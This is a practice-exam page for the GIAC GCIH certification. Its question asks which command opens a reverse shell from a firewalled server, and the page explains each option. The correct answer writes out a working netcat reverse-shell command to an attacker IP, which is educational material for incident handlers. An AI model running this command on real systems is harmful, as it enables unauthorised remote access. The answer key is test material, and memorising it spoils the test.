nerdexam
GIAC

GCIH · Question #802

An attacker at IP address 11.22.33.44 set up a reverse shell so he could execute commands on a server (internal IP address 192.168.20.21) that sits behind a site firewall blocking incoming SSH traffic

The correct answer is C. nc 11.22.33.44 22 -e /bin/sh. A reverse shell has the compromised server initiate an outbound connection to the attacker, bypassing inbound firewall restrictions. Netcat with the -e flag achieves this by connecting out and piping a shell over the connection.

Vulnerability Exploitation & Privilege Escalation

Question

An attacker at IP address 11.22.33.44 set up a reverse shell so he could execute commands on a server (internal IP address 192.168.20.21) that sits behind a site firewall blocking incoming SSH traffic but allowing all outbound traffic. What command would he run on the server?

Options

  • Atcpdump -nn port 22 and host 11.22.33.44
  • Bssh -b 192.168.20.21 -p 22 11.22.33.44
  • Cnc 11.22.33.44 22 -e /bin/sh
  • Dlsof -i @192.168.20.21:22

How the community answered

(38 responses)
  • A
    8% (3)
  • B
    3% (1)
  • C
    84% (32)
  • D
    5% (2)

Why each option

A reverse shell has the compromised server initiate an outbound connection to the attacker, bypassing inbound firewall restrictions. Netcat with the -e flag achieves this by connecting out and piping a shell over the connection.

Atcpdump -nn port 22 and host 11.22.33.44

tcpdump is a passive packet capture utility used for monitoring network traffic, not for establishing any type of interactive shell or remote connection.

Bssh -b 192.168.20.21 -p 22 11.22.33.44

The `ssh -b` flag binds the local address for an outbound SSH client connection - this would attempt to SSH into the attacker's machine rather than grant the attacker shell access to the server.

Cnc 11.22.33.44 22 -e /bin/shCorrect

The command `nc 11.22.33.44 22 -e /bin/sh` uses netcat to initiate an outbound TCP connection from the server to the attacker on port 22 - permitted because all outbound traffic is allowed. The `-e /bin/sh` flag pipes the shell's stdin and stdout over the connection, giving the attacker an interactive shell on the server without requiring any inbound connection that the firewall would block.

Dlsof -i @192.168.20.21:22

lsof -i is a diagnostic command used to list currently open network connections and file descriptors, not a tool for creating or tunneling any remote shell.

Concept tested: Netcat reverse shell bypassing inbound firewall rules

Source: https://nmap.org/ncat/guide/ncat-shell.html

Topics

#reverse shell#netcat#firewall bypass#outbound tunneling

Community Discussion

No community discussion yet for this question.

Full GCIH Practice